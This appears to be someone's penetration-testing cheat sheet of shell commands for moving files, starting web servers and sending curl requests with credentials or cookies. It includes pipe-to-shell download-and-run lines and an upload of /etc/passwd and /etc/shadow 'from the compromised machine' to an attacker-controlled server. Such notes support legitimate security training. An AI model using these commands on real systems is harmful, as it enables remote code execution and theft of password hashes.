###################################################################
########################### Download ##############################
###################################################################
# Command: wget
wget <URL> -O <output_file>

# execute directly using a pipe (fileless download using wget)
wget -qO- <URL> | python3

# Command: curl
curl -o <output_file> <URL>

# execute directly using a pipe (fileless download using curl)
curl <URL> | bash

# Command: download using bash
# connect to the target webserver
exec 3<>/dev/tcp/10.10.10.32/80

# HTTP Get Request
echo -e "GET /file.sh HTTP/1.1\n\n">&3

# print the response
cat <&3

# Command: ssh
scp <user>@<URL>:<path_to_file>

###################################################################
########################### Upload##############################
###################################################################

# Command: using the uploadserver module to use HTTPS
# Start web server
sudo python3 -m pip install --user uploadserver

# we need to create a certificate (here, self-signed)
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# start web server
mkdir https && cd https

# sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

# now, upload from the compromised machine /etc/passwd and /etc/shadow
curl -X post https://<URL>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure


###################################################################
########################### FIND A TITLE ##########################
###################################################################

# enable ssh server
sudo systemctl enable ssh

# start ssh server
sudo systemctl start ssh

# checking for ssh listening port
netstat -lnpt

# start apache web server
sudo systemctl start apache2

# start web server with python 3
python3 -m http.server

# start web server with npm
# install http-server
npm install -g http-server
# then run the server on port 8080
http-server -p 8080
# -g: global installation

# start web server with php
php -S 127.0.0.1:8080

# Command: curl
curl -u user:password http://<SERVER_IP>:<PORT>/

# version 2
curl http://admin:admin@<SERVER_IP>:<PORT>/


# POST
culr -X POST -d 'username=<username>&password=<password>' http://<SERVER_IP>:<PORT>/

# curl with cookie
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/

# curl with cookie version 2
curl -H 'Cookie: PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/

# curl with cookie & content-type=json
curl -X POST -d '{"search":"london"}' -b 'PHPSESSID=1hec5a146v4i81o63pum5fl3bf' -H 'Content-Type: application/json' http://83.136.253.59:52232/search.php

